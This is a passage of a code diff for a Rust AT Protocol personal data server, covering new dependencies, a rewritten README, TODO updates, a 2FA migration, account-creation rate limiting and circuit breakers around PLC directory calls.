] 4269 4270 [[package]] 4271 + name = "pxfm" 4272 + version = "0.1.27" 4273 + source = "registry+https://github.com/rust-lang/crates.io-index" 4274 + checksum = "7186d3822593aa4393561d186d1393b3923e9d6163d3fbfd6e825e3e6cf3e6a8" 4275 + dependencies = [ 4276 + "num-traits", 4277 + ] 4278 + 4279 + [[package]] 4280 + name = "quanta" 4281 + version = "0.12.6" 4282 + source = "registry+https://github.com/rust-lang/crates.io-index" 4283 + checksum = "f3ab5a9d756f0d97bdc89019bd2e4ea098cf9cde50ee7564dde6b81ccc8f06c7" 4284 + dependencies = [ 4285 + "crossbeam-utils", 4286 + "libc", 4287 + "once_cell", 4288 + "raw-cpuid", 4289 + "wasi", 4290 + "web-sys", 4291 + "winapi", 4292 + ] 4293 + 4294 + [[package]] 4295 + name = "quick-error" 4296 + version = "2.0.1" 4297 + source = "registry+https://github.com/rust-lang/crates.io-index" 4298 + checksum = "a993555f31e5a609f617c12db6250dedcac1b0a85076912c436e6fc9b2c8e6a3" 4299 + 4300 + [[package]] 4301 name = "quinn" 4302 version = "0.11.9" 4303 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 4431 version = "0.3.2" 4432 source = "registry+https://github.com/rust-lang/crates.io-index" 4433 checksum = "d20581732dd76fa913c7dff1a2412b714afe3573e94d41c34719de73337cc8ab" 4434 + 4435 + [[package]] 4436 + name = "raw-cpuid" 4437 + version = "11.6.0" 4438 + source = "registry+https://github.com/rust-lang/crates.io-index" 4439 + checksum = "498cd0dc59d73224351ee52a95fee0f1a617a2eae0e7d9d720cc622c73a54186" 4440 + dependencies = [ 4441 + "bitflags", 4442 + ] 4443 4444 [[package]] 4445 name = "redox_syscall" ··· 5209 checksum = "d5fe4ccb98d9c292d56fec89a5e07da7fc4cf0dc11e156b41793132775d3e591" 5210 5211 [[package]] 5212 + name = "spinning_top" 5213 + version = "0.3.0" 5214 + source = "registry+https://github.com/rust-lang/crates.io-index" 5215 + checksum = "d96d2d1d716fb500937168cc09353ffdc7a012be8475ac7308e1bdf0e3923300" 5216 + dependencies = [ 5217 + "lock_api", 5218 + ] 5219 + 5220 + [[package]] 5221 name = "spki" 5222 version = "0.6.0" 5223 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 6405 ] 6406 6407 [[package]] 6408 + name = "weezl" 6409 + version = "0.1.12" 6410 + source = "registry+https://github.com/rust-lang/crates.io-index" 6411 + checksum = "a28ac98ddc8b9274cb41bb4d9d4d5c425b6020c50c46f25559911905610b4a88" 6412 + 6413 + [[package]] 6414 name = "whoami" 6415 version = "1.6.1" 6416 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 7021 "quote", 7022 "syn 2.0.111", 7023 ] 7024 + 7025 + [[package]] 7026 + name = "zune-core" 7027 + version = "0.5.0" 7028 + source = "registry+https://github.com/rust-lang/crates.io-index" 7029 + checksum = "111f7d9820f05fd715df3144e254d6fc02ee4088b0644c0ffd0efc9e6d9d2773" 7030 + 7031 + [[package]] 7032 + name = "zune-jpeg" 7033 + version = "0.5.6" 7034 + source = "registry+https://github.com/rust-lang/crates.io-index" 7035 + checksum = "f520eebad972262a1dde0ec455bce4f8b298b1e5154513de58c114c4c54303e8" 7036 + dependencies = [ 7037 + "zune-core", 7038 + ]
+2
Cargo.toml
··· 16 cid = "0.11.1" 17 dotenvy = "0.15.7" 18 futures = "0.3.30" 19 hkdf = "0.12" 20 hmac = "0.12" 21 aes-gcm = "0.10" ··· 47 urlencoding = "2.1" 48 uuid = { version = "1.19.0", features = ["v4", "fast-rng"] } 49 iroh-car = "0.5.1" 50 51 [features] 52 external-infra = []
··· 16 cid = "0.11.1" 17 dotenvy = "0.15.7" 18 futures = "0.3.30" 19 + governor = "0.10" 20 hkdf = "0.12" 21 hmac = "0.12" 22 aes-gcm = "0.10" ··· 48 urlencoding = "2.1" 49 uuid = { version = "1.19.0", features = ["v4", "fast-rng"] } 50 iroh-car = "0.5.1" 51 + image = { version = "0.25", default-features = false, features = ["jpeg", "png", "gif", "webp"] } 52 53 [features] 54 external-infra = []
+79 -51
README.md
··· 1 - # Lewis' BS PDS Sandbox 2 3 - When I'm actually done then yeah let's make this into a proper official-looking repo perhaps under an official-looking account or something. 4 5 - This project implements a Personal Data Server (PDS) implementation for the AT Protocol. 6 7 - Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and aims to be a complete drop-in replacement for Bluesky's reference PDS implementation. 8 9 - In fact I aim to also implement a plugin system soon, so that we can add things onto our own PDSes on top of the default BS. 10 11 - I'm also taking ideas on what other PDSes lack, such as an on-PDS webpage that users can access to manage their records and preferences. 12 13 - :3 14 15 - # Running locally 16 17 - The reader will need rust installed locally. 18 19 - I personally run the postgres db, and an S3-compatible object store with podman compose up db objsto -d. 20 21 - Run the PDS directly: 22 23 - just run 24 - 25 - Configuration is via environment variables: 26 27 - DATABASE_URL postgres connection string 28 - S3_BUCKET blob storage bucket name 29 - S3_ENDPOINT S3 endpoint URL (for MinIO etc) 30 - AWS_ACCESS_KEY_ID S3 credentials 31 - AWS_SECRET_ACCESS_KEY 32 - AWS_REGION 33 - PDS_HOSTNAME public hostname of this PDS 34 - APPVIEW_URL appview to proxy unimplemented endpoints to 35 - RELAYS comma-separated list of relay WebSocket URLs 36 37 - Optional email stuff: 38 39 - MAIL_FROM_ADDRESS sender address (enables email notifications) 40 - MAIL_FROM_NAME sender name (default: BSPDS) 41 - SENDMAIL_PATH path to sendmail binary 42 43 - Development 44 45 - just shows available commands 46 - just test run tests (spins up postgres and minio via testcontainers) 47 - just lint clippy + fmt check 48 - just db-reset drop and recreate local database 49 50 - The test suite uses testcontainers so you don't need to set up anything manually for running tests. 51 52 - ## What's implemented 53 54 - Most of the com.atproto.* namespace is done. Server endpoints, repo operations, sync, identity, admin, moderation. The firehose websocket works. OAuth is not done yet. 55 56 - See TODO.md for the full breakdown of what's done and what's left. 57 58 - Structure 59 60 - src/ 61 - main.rs server entrypoint 62 - lib.rs router setup 63 - state.rs app state (db pool, stores) 64 - api/ XRPC handlers organized by namespace 65 - auth/ JWT handling 66 - repo/ postgres block store 67 - storage/ S3 blob storage 68 - sync/ firehose, relay clients 69 - notifications/ email service 70 - tests/ integration tests 71 - migrations/ sqlx migrations 72 73 - License 74 75 - idk
··· 1 + # BSPDS, a Personal Data Server 2 3 + A production-grade Personal Data Server (PDS) implementation for the AT Protocol. 4 5 + Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and is designed to be a complete drop-in replacement for Bluesky's reference PDS implementation. 6 7 + ## Features 8 9 + - Full AT Protocol support, all `com.atproto.*` endpoints implemented 10 + - OAuth 2.1 Provider. PKCE, DPoP, Pushed Authorization Requests 11 + - PostgreSQL, prod-ready database backend 12 + - S3-compatible object storage for blobs; works with AWS S3, UpCloud object storage, self-hosted MinIO, etc. 13 + - WebSocket `subscribeRepos` endpoint for real-time sync 14 + - Crawler notifications via `requestCrawl` 15 + - Multi-channel notifications: email, discord, telegram, signal 16 + - Per-IP rate limiting on sensitive endpoints 17 18 + ## Running Locally 19 20 + Requires Rust installed locally. 21 22 + Run PostgreSQL and S3-compatible object store (e.g., with podman/docker): 23 24 + ```bash 25 + podman compose up db objsto -d 26 + ``` 27 28 + Run the PDS: 29 30 + ```bash 31 + just run 32 + ``` 33 34 + ## Configuration 35 36 + ### Required 37 38 + | Variable | Description | 39 + |----------|-------------| 40 + | `DATABASE_URL` | PostgreSQL connection string | 41 + | `S3_BUCKET` | Blob storage bucket name | 42 + | `S3_ENDPOINT` | S3 endpoint URL (for MinIO, etc.) | 43 + | `AWS_ACCESS_KEY_ID` | S3 credentials | 44 + | `AWS_SECRET_ACCESS_KEY` | S3 credentials | 45 + | `AWS_REGION` | S3 region | 46 + | `PDS_HOSTNAME` | Public hostname of this PDS | 47 + | `JWT_SECRET` | Secret for OAuth token signing (HS256) | 48 + | `KEY_ENCRYPTION_KEY` | Key for encrypting user signing keys (AES-256-GCM) | 49 50 + ### Optional 51 52 + | Variable | Description | 53 + |----------|-------------| 54 + | `APPVIEW_URL` | Appview URL to proxy unimplemented endpoints to | 55 + | `CRAWLERS` | Comma-separated list of relay URLs to notify via `requestCrawl` | 56 57 + ### Notifications 58 59 + At least one channel should be configured for user notifications (password reset, email verification, etc.): 60 61 + | Variable | Description | 62 + |----------|-------------| 63 + | `MAIL_FROM_ADDRESS` | Email sender address (enables email via sendmail) | 64 + | `MAIL_FROM_NAME` | Email sender name (default: "BSPDS") | 65 + | `SENDMAIL_PATH` | Path to sendmail binary (default: /usr/sbin/sendmail) | 66 + | `DISCORD_WEBHOOK_URL` | Discord webhook URL for notifications | 67 + | `TELEGRAM_BOT_TOKEN` | Telegram bot token for notifications | 68 + | `SIGNAL_CLI_PATH` | Path to signal-cli binary | 69 + | `SIGNAL_SENDER_NUMBER` | Signal sender phone number (+1234567890 format) | 70 71 + ## Development 72 73 + ```bash 74 + just # Show available commands 75 + just test # Run tests (auto-starts postgres/minio, runs nextest) 76 + just lint # Clippy + fmt check 77 + just db-reset # Drop and recreate local database 78 + ``` 79 80 + ## Project Structure 81 82 + ``` 83 + src/ 84 + main.rs Server entrypoint 85 + lib.rs Router setup 86 + state.rs AppState (db pool, stores, rate limiters, circuit breakers) 87 + api/ XRPC handlers organized by namespace 88 + auth/ JWT authentication (ES256K per-user keys) 89 + oauth/ OAuth 2.1 provider (HS256 server-wide) 90 + repo/ PostgreSQL block store 91 + storage/ S3 blob storage 92 + sync/ Firehose, CAR export, crawler notifications 93 + notifications/ Multi-channel notification service 94 + plc/ PLC directory client 95 + circuit_breaker/ Circuit breaker for external services 96 + rate_limit/ Per-IP rate limiting 97 + tests/ Integration tests 98 + migrations/ SQLx migrations 99 + ``` 100 101 + ## License 102 103 + TBD
+49 -37
TODO.md
··· 81 - [x] Implement `com.atproto.sync.listBlobs`. 82 - [x] Crawler Interaction 83 - [x] Implement `com.atproto.sync.requestCrawl` (Notify relays to index us). 84 85 ## Identity (`com.atproto.identity`) 86 - [x] Resolution ··· 108 - [x] Implement `com.atproto.moderation.createReport`. 109 110 ## Temp Namespace (`com.atproto.temp`) 111 - - [ ] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups). 112 113 ## OAuth 2.1 Support 114 Full OAuth 2.1 provider for ATProto native app authentication. 115 - [x] OAuth Provider Core 116 - [x] Implement `/.well-known/oauth-protected-resource` metadata endpoint. 117 - [x] Implement `/.well-known/oauth-authorization-server` metadata endpoint. 118 - - [x] Implement `/oauth/authorize` authorization endpoint (headless JSON mode). 119 - [x] Implement `/oauth/par` Pushed Authorization Request endpoint. 120 - [x] Implement `/oauth/token` token endpoint (authorization_code + refresh_token grants). 121 - [x] Implement `/oauth/jwks` JSON Web Key Set endpoint. ··· 132 - [x] Client metadata fetching and validation. 133 - [x] PKCE (S256) enforcement. 134 - [x] OAuth token verification extractor for protected resources. 135 - - [ ] Authorization UI templates (currently headless-only, returns JSON for programmatic flows). 136 - - [ ] Implement `private_key_jwt` signature verification (currently rejects with clear error). 137 138 ## OAuth Security Notes 139 140 - I've tried to ensure that this codebase is not vulnerable to the following: 141 142 - Constant-time comparison for signature verification (prevents timing attacks) 143 - HMAC-SHA256 for access token signing with configurable secret ··· 151 - All database queries use parameterized statements (no SQL injection) 152 - Deactivated/taken-down accounts blocked from OAuth authorization 153 - Client ID validation on token exchange (defense-in-depth against cross-client attacks) 154 155 ### Auth Notes 156 - - Algorithm choice: Using ES256K (secp256k1 ECDSA) with per-user keys. Ref PDS uses HS256 (HMAC) with single server key. Our approach provides better key isolation but differs from reference implementation. 157 - - [ ] Support the ref PDS HS256 system too. 158 - - Token storage: Now storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks. 159 - - Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from MASTER_KEY environment variable. Migration-safe: supports both encrypted (version 1) and plaintext (version 0) keys. 160 161 ## PDS-Level App Endpoints 162 These endpoints need to be implemented at the PDS level (not just proxied to appview). ··· 178 ### Notification (`app.bsky.notification`) 179 - [x] Implement `app.bsky.notification.registerPush` (push notification registration, proxied). 180 181 - ## Deprecated Sync Endpoints (for compatibility) 182 - - [ ] Implement `com.atproto.sync.getCheckout` (deprecated, still needed for compatibility). 183 - - [ ] Implement `com.atproto.sync.getHead` (deprecated, still needed for compatibility). 184 - 185 - ## Misc HTTP Endpoints 186 - - [ ] Implement `/robots.txt` endpoint. 187 - 188 - ## Record Schema Validation 189 - - [ ] Handle this generically. 190 - 191 - ## Preference Storage 192 - User preferences (for app.bsky.actor.getPreferences/putPreferences): 193 - - [x] Create preferences table for storing user app preferences. 194 - - [x] Implement `app.bsky.actor.getPreferences` handler (read from postgres, proxy fallback). 195 - - [x] Implement `app.bsky.actor.putPreferences` handler (write to postgres). 196 - 197 ## Infrastructure & Core Components 198 - [x] Sequencer (Event Log) 199 - [x] Implement a `Sequencer` (backed by `repo_seq` table). ··· 206 - [x] Manage Repo Root in `repos` table. 207 - [x] Implement Atomic Repo Transactions. 208 - [x] Ensure `blocks` write, `repo_root` update, `records` index update, and `sequencer` event are committed in a single transaction. 209 - - [ ] Implement concurrency control (row-level locking on `repos` table) to prevent concurrent writes to the same repo. 210 - [ ] DID Cache 211 - [ ] Implement caching layer for DID resolution (Redis or in-memory). 212 - [ ] Handle cache invalidation/expiry. 213 - - [ ] Background Jobs 214 - - [ ] Implement `Crawlers` service (debounce notifications to relays). 215 - [x] Notification Service 216 - [x] Queue-based notification system with database table 217 - [x] Background worker polling for pending notifications 218 - [x] Extensible sender trait for multiple channels 219 - [x] Email sender via OS sendmail/msmtp 220 - - [ ] Discord bot sender 221 - - [ ] Telegram bot sender 222 - - [ ] Signal bot sender 223 - [x] Helper functions for common notification types (welcome, password reset, email verification, etc.) 224 - [x] Respect user's `preferred_notification_channel` setting for non-email-specific notifications 225 - - [ ] Image Processing 226 - - [ ] Implement image resize/formatting pipeline (for blob uploads). 227 - [x] IPLD & MST 228 - [x] Implement Merkle Search Tree logic for repo signing. 229 - [x] Implement CAR (Content Addressable Archive) encoding/decoding. 230 - - [ ] Validation 231 - - [ ] DID PLC Operations (Sign rotation keys). 232 - - [ ] Fix any remaining TODOs in the code, everywhere, full stop. 233 234 - ## Web Management UI 235 A single-page web app for account management. The frontend (JS framework) calls existing ATProto XRPC endpoints - no server-side rendering or bespoke HTML form handlers. 236 237 ### Architecture
··· 81 - [x] Implement `com.atproto.sync.listBlobs`. 82 - [x] Crawler Interaction 83 - [x] Implement `com.atproto.sync.requestCrawl` (Notify relays to index us). 84 + - [x] Deprecated Sync Endpoints (for compatibility) 85 + - [x] Implement `com.atproto.sync.getCheckout` (deprecated). 86 + - [x] Implement `com.atproto.sync.getHead` (deprecated). 87 88 ## Identity (`com.atproto.identity`) 89 - [x] Resolution ··· 111 - [x] Implement `com.atproto.moderation.createReport`. 112 113 ## Temp Namespace (`com.atproto.temp`) 114 + - [x] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups). 115 + 116 + ## Misc HTTP Endpoints 117 + - [x] Implement `/robots.txt` endpoint. 118 119 ## OAuth 2.1 Support 120 Full OAuth 2.1 provider for ATProto native app authentication. 121 - [x] OAuth Provider Core 122 - [x] Implement `/.well-known/oauth-protected-resource` metadata endpoint. 123 - [x] Implement `/.well-known/oauth-authorization-server` metadata endpoint. 124 + - [x] Implement `/oauth/authorize` authorization endpoint (with login UI). 125 - [x] Implement `/oauth/par` Pushed Authorization Request endpoint. 126 - [x] Implement `/oauth/token` token endpoint (authorization_code + refresh_token grants). 127 - [x] Implement `/oauth/jwks` JSON Web Key Set endpoint. ··· 138 - [x] Client metadata fetching and validation. 139 - [x] PKCE (S256) enforcement. 140 - [x] OAuth token verification extractor for protected resources. 141 + - [x] Authorization UI templates (HTML login form). 142 + - [x] Implement `private_key_jwt` signature verification with async JWKS fetching. 143 + - [x] HS256 JWT support (matches reference PDS). 144 145 ## OAuth Security Notes 146 147 + Security measures implemented: 148 149 - Constant-time comparison for signature verification (prevents timing attacks) 150 - HMAC-SHA256 for access token signing with configurable secret ··· 158 - All database queries use parameterized statements (no SQL injection) 159 - Deactivated/taken-down accounts blocked from OAuth authorization 160 - Client ID validation on token exchange (defense-in-depth against cross-client attacks) 161 + - HTML escaping in OAuth templates (XSS prevention) 162 163 ### Auth Notes 164 + - Dual algorithm support: ES256K (secp256k1 ECDSA) with per-user keys AND HS256 (HMAC) for compatibility with reference PDS. 165 + - Token storage: Storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks. 166 + - Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from KEY_ENCRYPTION_KEY environment variable. 167 168 ## PDS-Level App Endpoints 169 These endpoints need to be implemented at the PDS level (not just proxied to appview). ··· 185 ### Notification (`app.bsky.notification`) 186 - [x] Implement `app.bsky.notification.registerPush` (push notification registration, proxied). 187 188 ## Infrastructure & Core Components 189 - [x] Sequencer (Event Log) 190 - [x] Implement a `Sequencer` (backed by `repo_seq` table). ··· 197 - [x] Manage Repo Root in `repos` table. 198 - [x] Implement Atomic Repo Transactions. 199 - [x] Ensure `blocks` write, `repo_root` update, `records` index update, and `sequencer` event are committed in a single transaction. 200 + - [x] Implement concurrency control (row-level locking via FOR UPDATE). 201 - [ ] DID Cache 202 - [ ] Implement caching layer for DID resolution (Redis or in-memory). 203 - [ ] Handle cache invalidation/expiry. 204 + - [x] Crawlers Service 205 + - [x] Implement `Crawlers` service (debounce notifications to relays). 206 + - [x] 20-minute notification debounce. 207 + - [x] Circuit breaker for relay failures. 208 - [x] Notification Service 209 - [x] Queue-based notification system with database table 210 - [x] Background worker polling for pending notifications 211 - [x] Extensible sender trait for multiple channels 212 - [x] Email sender via OS sendmail/msmtp 213 + - [x] Discord webhook sender 214 + - [x] Telegram bot sender 215 + - [x] Signal CLI sender 216 - [x] Helper functions for common notification types (welcome, password reset, email verification, etc.) 217 - [x] Respect user's `preferred_notification_channel` setting for non-email-specific notifications 218 + - [x] Image Processing 219 + - [x] Implement image resize/formatting pipeline (for blob uploads). 220 + - [x] WebP conversion for thumbnails. 221 + - [x] EXIF stripping. 222 + - [x] File size limits (10MB default). 223 - [x] IPLD & MST 224 - [x] Implement Merkle Search Tree logic for repo signing. 225 - [x] Implement CAR (Content Addressable Archive) encoding/decoding. 226 + - [x] Cycle detection in CAR export. 227 + - [x] Rate Limiting 228 + - [x] Per-IP rate limiting on login (10/min). 229 + - [x] Per-IP rate limiting on OAuth token endpoint (30/min). 230 + - [x] Per-IP rate limiting on password reset (5/hour). 231 + - [x] Per-IP rate limiting on account creation (10/hour). 232 + - [x] Circuit Breakers 233 + - [x] PLC directory circuit breaker (5 failures → open, 60s timeout). 234 + - [x] Relay notification circuit breaker (10 failures → open, 30s timeout). 235 + - [x] Security Hardening 236 + - [x] Email header injection prevention (CRLF sanitization). 237 + - [x] Signal command injection prevention (phone number validation). 238 + - [x] Constant-time signature comparison. 239 + - [x] SSRF protection for outbound requests. 240 241 + ## Lewis' fabulous mini-list of remaining TODOs 242 + - [ ] DID resolution caching (valkey). 243 + - [ ] Record schema validation (generic validation framework). 244 + - [ ] Fix any remaining TODOs in the code. 245 + 246 + ## Future: Web Management UI 247 A single-page web app for account management. The frontend (JS framework) calls existing ATProto XRPC endpoints - no server-side rendering or bespoke HTML form handlers. 248 249 ### Architecture
+16
migrations/202512211700_add_2fa.sql
···
··· 1 + ALTER TABLE users ADD COLUMN two_factor_enabled BOOLEAN NOT NULL DEFAULT FALSE; 2 + 3 + ALTER TYPE notification_type ADD VALUE 'two_factor_code'; 4 + 5 + CREATE TABLE oauth_2fa_challenge ( 6 + id UUID PRIMARY KEY DEFAULT gen_random_uuid(), 7 + did TEXT NOT NULL REFERENCES users(did) ON DELETE CASCADE, 8 + request_uri TEXT NOT NULL, 9 + code TEXT NOT NULL, 10 + attempts INTEGER NOT NULL DEFAULT 0, 11 + created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(), 12 + expires_at TIMESTAMPTZ NOT NULL DEFAULT NOW() + INTERVAL '10 minutes' 13 + ); 14 + 15 + CREATE INDEX idx_oauth_2fa_challenge_request_uri ON oauth_2fa_challenge(request_uri); 16 + CREATE INDEX idx_oauth_2fa_challenge_expires ON oauth_2fa_challenge(expires_at);
+65 -2
src/api/identity/account.rs
··· 3 use axum::{ 4 Json, 5 extract::State, 6 - http::StatusCode, 7 response::{IntoResponse, Response}, 8 }; 9 use bcrypt::{DEFAULT_COST, hash}; ··· 16 use std::sync::Arc; 17 use tracing::{error, info, warn}; 18 19 #[derive(Deserialize)] 20 #[serde(rename_all = "camelCase")] 21 pub struct CreateAccountInput { ··· 38 39 pub async fn create_account( 40 State(state): State<AppState>, 41 Json(input): Json<CreateAccountInput>, 42 ) -> Response { 43 info!("create_account called"); 44 if input.handle.contains('!') || input.handle.contains('@') { 45 return ( 46 StatusCode::BAD_REQUEST, ··· 184 let user_id = match user_insert { 185 Ok(row) => row.id, 186 Err(e) => { 187 error!("Error inserting user: {:?}", e); 188 - // TODO: Check for unique constraint violation on email/did specifically 189 return ( 190 StatusCode::INTERNAL_SERVER_ERROR, 191 Json(json!({"error": "InternalError"})),
··· 3 use axum::{ 4 Json, 5 extract::State, 6 + http::{HeaderMap, StatusCode}, 7 response::{IntoResponse, Response}, 8 }; 9 use bcrypt::{DEFAULT_COST, hash}; ··· 16 use std::sync::Arc; 17 use tracing::{error, info, warn}; 18 19 + fn extract_client_ip(headers: &HeaderMap) -> String { 20 + if let Some(forwarded) = headers.get("x-forwarded-for") { 21 + if let Ok(value) = forwarded.to_str() { 22 + if let Some(first_ip) = value.split(',').next() { 23 + return first_ip.trim().to_string(); 24 + } 25 + } 26 + } 27 + if let Some(real_ip) = headers.get("x-real-ip") { 28 + if let Ok(value) = real_ip.to_str() { 29 + return value.trim().to_string(); 30 + } 31 + } 32 + "unknown".to_string() 33 + } 34 + 35 #[derive(Deserialize)] 36 #[serde(rename_all = "camelCase")] 37 pub struct CreateAccountInput { ··· 54 55 pub async fn create_account( 56 State(state): State<AppState>, 57 + headers: HeaderMap, 58 Json(input): Json<CreateAccountInput>, 59 ) -> Response { 60 info!("create_account called"); 61 + 62 + let client_ip = extract_client_ip(&headers); 63 + if state.rate_limiters.account_creation.check_key(&client_ip).is_err() { 64 + warn!(ip = %client_ip, "Account creation rate limit exceeded"); 65 + return ( 66 + StatusCode::TOO_MANY_REQUESTS, 67 + Json(json!({ 68 + "error": "RateLimitExceeded", 69 + "message": "Too many account creation attempts. Please try again later." 70 + })), 71 + ) 72 + .into_response(); 73 + } 74 + 75 if input.handle.contains('!') || input.handle.contains('@') { 76 return ( 77 StatusCode::BAD_REQUEST, ··· 215 let user_id = match user_insert { 216 Ok(row) => row.id, 217 Err(e) => { 218 + if let Some(db_err) = e.as_database_error() { 219 + if db_err.code().as_deref() == Some("23505") { 220 + let constraint = db_err.constraint().unwrap_or(""); 221 + if constraint.contains("handle") || constraint.contains("users_handle") { 222 + return ( 223 + StatusCode::BAD_REQUEST, 224 + Json(json!({ 225 + "error": "HandleNotAvailable", 226 + "message": "Handle already taken" 227 + })), 228 + ) 229 + .into_response(); 230 + } else if constraint.contains("email") || constraint.contains("users_email") { 231 + return ( 232 + StatusCode::BAD_REQUEST, 233 + Json(json!({ 234 + "error": "InvalidEmail", 235 + "message": "Email already registered" 236 + })), 237 + ) 238 + .into_response(); 239 + } else if constraint.contains("did") || constraint.contains("users_did") { 240 + return ( 241 + StatusCode::BAD_REQUEST, 242 + Json(json!({ 243 + "error": "AccountAlreadyExists", 244 + "message": "An account with this DID already exists" 245 + })), 246 + ) 247 + .into_response(); 248 + } 249 + } 250 + } 251 error!("Error inserting user: {:?}", e); 252 return ( 253 StatusCode::INTERNAL_SERVER_ERROR, 254 Json(json!({"error": "InternalError"})),
+24 -5
src/api/identity/plc/sign.rs
··· 1 use crate::api::ApiError; 2 use crate::plc::{ 3 - create_update_op, sign_operation, PlcClient, PlcError, PlcService, 4 }; 5 use crate::state::AppState; 6 use axum::{ ··· 14 use serde::{Deserialize, Serialize}; 15 use serde_json::{json, Value}; 16 use std::collections::HashMap; 17 - use tracing::{error, info}; 18 19 #[derive(Debug, Deserialize)] 20 #[serde(rename_all = "camelCase")] ··· 166 }; 167 168 let plc_client = PlcClient::new(None); 169 - let last_op = match plc_client.get_last_op(did).await { 170 Ok(op) => op, 171 - Err(PlcError::NotFound) => { 172 return ( 173 StatusCode::NOT_FOUND, 174 Json(json!({ ··· 178 ) 179 .into_response(); 180 } 181 - Err(e) => { 182 error!("Failed to fetch PLC operation: {:?}", e); 183 return ( 184 StatusCode::BAD_GATEWAY,
··· 1 use crate::api::ApiError; 2 + use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError}; 3 use crate::plc::{ 4 + create_update_op, sign_operation, PlcClient, PlcError, PlcOpOrTombstone, PlcService, 5 }; 6 use crate::state::AppState; 7 use axum::{ ··· 15 use serde::{Deserialize, Serialize}; 16 use serde_json::{json, Value}; 17 use std::collections::HashMap; 18 + use tracing::{error, info, warn}; 19 20 #[derive(Debug, Deserialize)] 21 #[serde(rename_all = "camelCase")] ··· 167 }; 168 169 let plc_client = PlcClient::new(None); 170 + let did_clone = did.clone(); 171 + let result: Result<PlcOpOrTombstone, CircuitBreakerError<PlcError>> = with_circuit_breaker( 172 + &state.circuit_breakers.plc_directory, 173 + || async { plc_client.get_last_op(&did_clone).await }, 174 + ) 175 + .await; 176 + 177 + let last_op = match result { 178 Ok(op) => op, 179 + Err(CircuitBreakerError::CircuitOpen(e)) => { 180 + warn!("PLC directory circuit breaker open: {}", e); 181 + return ( 182 + StatusCode::SERVICE_UNAVAILABLE, 183 + Json(json!({ 184 + "error": "ServiceUnavailable", 185 + "message": "PLC directory service temporarily unavailable" 186 + })), 187 + ) 188 + .into_response(); 189 + } 190 + Err(CircuitBreakerError::OperationFailed(PlcError::NotFound)) => { 191 return ( 192 StatusCode::NOT_FOUND, 193 Json(json!({ ··· 197 ) 198 .into_response(); 199 } 200 + Err(CircuitBreakerError::OperationFailed(e)) => { 201 error!("Failed to fetch PLC operation: {:?}", e); 202 return ( 203 StatusCode::BAD_GATEWAY,
+34 -11
src/api/identity/plc/submit.rs
··· 1 use crate::api::ApiError; 2 - use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient}; 3 use crate::state::AppState; 4 use axum::{ 5 extract::State, ··· 183 } 184 185 let plc_client = PlcClient::new(None); 186 - if let Err(e) = plc_client.send_operation(did, &input.operation).await { 187 - error!("Failed to submit PLC operation: {:?}", e); 188 - return ( 189 - StatusCode::BAD_GATEWAY, 190 - Json(json!({ 191 - "error": "UpstreamError", 192 - "message": format!("Failed to submit to PLC directory: {}", e) 193 - })), 194 - ) 195 - .into_response(); 196 } 197 198 if let Err(e) = sqlx::query!(
··· 1 use crate::api::ApiError; 2 + use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError}; 3 + use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient, PlcError}; 4 use crate::state::AppState; 5 use axum::{ 6 extract::State, ··· 184 } 185 186 let plc_client = PlcClient::new(None); 187 + let operation_clone = input.operation.clone(); 188 + let did_clone = did.clone(); 189 + let result: Result<(), CircuitBreakerError<PlcError>> = with_circuit_breaker( 190 + &state.circuit_breakers.plc_directory, 191 + || async { plc_client.send_operation(&did_clone, &operation_clone).await }, 192 + ) 193 + .await; 194 + 195 + match result { 196 + Ok(()) => {} 197 + Err(CircuitBreakerError::CircuitOpen(e)) => { 198 + warn!("PLC directory circuit breaker open: {}", e); 199 + return ( 200 + StatusCode::SERVICE_UNAVAILABLE, 201 + Json(json!({ 202 + "error": "ServiceUnavailable", 203 + "message": "PLC directory service temporarily unavailable" 204 + })), 205 + ) 206 + .into_response(); 207 + } 208 + Err(CircuitBreakerError::OperationFailed(e)) => { 209 + error!("Failed to submit PLC operation: {:?}", e); 210 + return ( 211 + StatusCode::BAD_GATEWAY, 212 + Json(json!({ 213 + "error": "UpstreamError", 214 + "message": format!("Failed to submit to PLC directory: {}", e) 215 + })), 216 + ) 217 + .into_response(); 218 + } 219 } 220 221 if let Err(e) = sqlx::query!(
+1
src/api/mod.rs
··· 10 pub mod read_after_write; 11 pub mod repo; 12 pub mod server; 13 pub mod validation; 14 15 pub use error::ApiError;
··· 10 pub mod read_after_write; 11 pub mod repo; 12 pub mod server; 13 + pub mod temp; 14 pub mod validation; 15 16 pub use error::ApiError;
+46 -46
src/api/repo/record/read.rs
··· 167 168 let limit = input.limit.unwrap_or(50).clamp(1, 100); 169 let reverse = input.reverse.unwrap_or(false); 170 - 171 - // Simplistic query construction - no sophisticated cursor handling or rkey ranges for now, just basic pagination 172 - // TODO: Implement rkeyStart/End and correct cursor logic 173 - 174 let limit_i64 = limit as i64; 175 - let rows_res = if let Some(cursor) = &input.cursor { 176 - if reverse { 177 - sqlx::query!( 178 - "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4", 179 - user_id, 180 - input.collection, 181 - cursor, 182 - limit_i64 183 - ) 184 - .fetch_all(&state.db) 185 - .await 186 - .map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>()) 187 - } else { 188 - sqlx::query!( 189 - "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4", 190 - user_id, 191 - input.collection, 192 - cursor, 193 - limit_i64 194 - ) 195 .fetch_all(&state.db) 196 .await 197 - .map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>()) 198 - } 199 } 